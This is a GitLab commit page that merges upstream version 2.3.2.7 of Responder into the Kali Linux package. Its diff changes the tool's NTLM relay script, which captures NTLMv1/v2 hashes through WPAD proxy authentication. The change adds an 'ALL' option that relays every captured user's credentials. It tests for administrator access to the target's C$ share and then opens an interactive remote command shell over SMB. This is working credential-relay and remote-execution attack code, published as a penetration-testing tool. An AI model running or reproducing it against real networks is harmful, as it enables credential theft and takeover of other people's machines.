Commit cc064dad authored by Sophie Brun's avatar Sophie Brun

Merge tag 'upstream/2.3.2.7' into kali/master

Upstream version 2.3.2.7
parents 04d27d0f bee9953c
......@@ -20,7 +20,7 @@ import subprocess
from utils import *
__version__ = 'Responder 2.3.2.5'
__version__ = 'Responder 2.3.2.7'
class Settings:
......
This diff is collapsed.
......@@ -20,7 +20,7 @@ from Finger import RunFinger
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
from socket import *
__version__ = "0.2"
__version__ = "0.4"
def UserCallBack(op, value, dmy, parser):
args=[]
......@@ -55,7 +55,7 @@ def ShowWelcome():
print '\n\033[1;34mResponder Proxy Auth to SMB NTLMv1/2 Relay 0.2\nSupporting NTLMv1 and NTLMv2.'
print 'Send bugs/hugs/comments to: laurent.gaffie@gmail.com'
print 'Usernames to relay (-u) are case sensitive.'
print 'To kill this script hit CRTL-C or <Enter>.\033[1;31m\n'
print 'To kill this script hit CRTL-C.\033[1;31m\n'
print 'Use this script in combination with Responder.py for best results.'
print 'Do not to use Responder.py with -P set. This tool does the same'
print 'than -P but with cross-protocol NTLM relay. Always target a box '
......@@ -127,7 +127,7 @@ def ParseHTTPHash(data, key, client):
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
print "[+] Received NTLMv1 hash from: %s"%(client)
if User in UserToRelay:
if User in UserToRelay or "ALL" in UserToRelay:
print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
if ReadData("SMBRelay-Session.txt", client, User, HostName, Host[0], cmd=None):
return None, None
......@@ -148,7 +148,7 @@ def ParseHTTPHash(data, key, client):
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
print "[+] Received NTLMv2 hash from: %s"%(client)
if User in UserToRelay:
if User in UserToRelay or "ALL" in UserToRelay:
print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
if ReadData("SMBRelay-Session.txt", client, User, Domain, Host[0], cmd=None):
return None, None
......@@ -264,35 +264,40 @@ def HTTPProxyRelay():
smbdata = s.recv(2048)
return smbdata, s, addr[0], Username, Domain
else:
return None, None, None, None, None
return None
else:
Response = WPAD_Auth_407_Ans()
conn.send(str(Response))
data = conn.recv(4096)
except:
return None, None, None, None, None
return None
def RunPsExec(Host):
data, s, clientIP, Username, Domain = HTTPProxyRelay()
if data == None:
GetCredentials = HTTPProxyRelay()
if GetCredentials == None:
return False
data, s, clientIP, Username, Domain = GetCredentials
if data[8:10] == "\x73\x6d":
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder."
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
return False
if data[8:10] == "\x73\x8d":
print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
return False
## First, check if user has admin privs on C$:
## Tree Connect
if data[8:10] == "\x73\x00":
GetSessionResponseFlags(data)#Verify if the target returned a guest session.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
......@@ -301,16 +306,34 @@ def RunPsExec(Host):
## Fail Handling.
if data[8:10] == "\x75\x22":
print "[+] Tree Connect AndX denied. SMB Signing is likely mandatory on the target, or low privilege user.\n[+] Hashes were saved anyways in Responder/logs/ folder."
print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
return False
return False
## Fail Handling.
if data[8:10] == "\x75\xcc":
print "[+] Tree Connect AndX denied. Bad Network Name returned."
return False
## NtCreateAndx
## Tree Connect
if data[8:10] == "\x75\x00":
print "[+] Looks good, "+Username+" has admin rights on C$."
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
## Go to NtCreateAndx
if data[8:10] == "\x75\x00":
print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
while True:
if data[8:10] == "\x75\x00":
thread.start_new_thread(SMBKeepAlive, (s,data, 15)) #keep it alive every 15 secs.
#thread.start_new_thread(SMBKeepAlive, (s,data, 15)) #keep it alive every 15 secs.
thread.start_new_thread(get_command, ())
while Cmd == "":
pass
......@@ -359,3 +382,5 @@ if __name__ == '__main__':
main()
except:
raise
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment